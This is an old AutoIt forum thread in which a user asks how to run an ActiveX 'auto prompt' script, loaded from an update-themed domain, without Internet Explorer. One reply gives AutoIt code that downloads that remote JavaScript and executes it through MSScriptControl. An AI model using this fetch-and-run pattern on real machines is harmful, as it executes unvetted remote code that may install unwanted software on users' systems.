infernothebest Posted August 26, 2005 Posted August 26, 2005 how to use a active - x script without internet explorer Apple Keybord shortcuts for XP
WSCPorts Posted August 26, 2005 Posted August 26, 2005 what do u mean...?? more thorough explanation pls.. and u can use activeXObjects 'Not Scripts' anywhere that active scripting is used... http://www.myclanhosting.com/defiasVisit Join and contribute to a soon to be leader in Custumized tools development in [C# .Net 1.1 ~ 2.0/C/C++/MFC/AutoIt3/Masm32]
infernothebest Posted August 26, 2005 Author Posted August 26, 2005 normaly you must open this u must open this voia internet explorer <!-- AUTO PROMPT START --> <script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a078a875/a174a8.js"></script> <script language="javascript" type="text/javascript">self.focus();</script> <!-- AUTO PROMPT END --> Apple Keybord shortcuts for XP
Josbe Posted August 26, 2005 Posted August 26, 2005 normaly you must open this u must open this voia internet explorer<!-- AUTO PROMPT START --><script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a078a875/a174a8.js"></script><script language="javascript" type="text/javascript">self.focus();</script><!-- AUTO PROMPT END --><{POST_SNAPBACK}>Would be...ControlFocus AUTOIT > AutoIt docs / Beta folder - AutoIt latest beta
therks Posted August 27, 2005 Posted August 27, 2005 (edited) I think maybe he's looking to use the whole thing Jos. Edited August 27, 2005 by Saunders My AutoIt Stuff | My Github
infernothebest Posted August 27, 2005 Author Posted August 27, 2005 sow what must i do? Apple Keybord shortcuts for XP
Josbe Posted August 27, 2005 Posted August 27, 2005 (edited) sow what must i do?<{POST_SNAPBACK}>What do you want?Suggestions:- Post your code or snippet.- Explain the trouble with more info.edit: typo Edited August 27, 2005 by Josbe AUTOIT > AutoIt docs / Beta folder - AutoIt latest beta
infernothebest Posted August 27, 2005 Author Posted August 27, 2005 this active-x code must be installed on the local machine thats it Apple Keybord shortcuts for XP
infernothebest Posted August 28, 2005 Author Posted August 28, 2005 i dont know where 2 start Apple Keybord shortcuts for XP
WSCPorts Posted September 7, 2005 Posted September 7, 2005 $JS = InetGetSource(" http://static.windupdates.com/prompts/a078...174a8.js");Create a Script ControlDim $ScriptObj = ObjCreate("MSScriptControl.ScriptControl")$ScriptObj.Language = "JScript"$ScriptObj.AddCode($JS)$ScriptObj.Execute() $ScriptObj.ExecuteStatement( "Self.Focus" ) http://www.myclanhosting.com/defiasVisit Join and contribute to a soon to be leader in Custumized tools development in [C# .Net 1.1 ~ 2.0/C/C++/MFC/AutoIt3/Masm32]
infernothebest Posted September 8, 2005 Author Posted September 8, 2005 i will try it thx for helping;) if it works i reply Apple Keybord shortcuts for XP
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now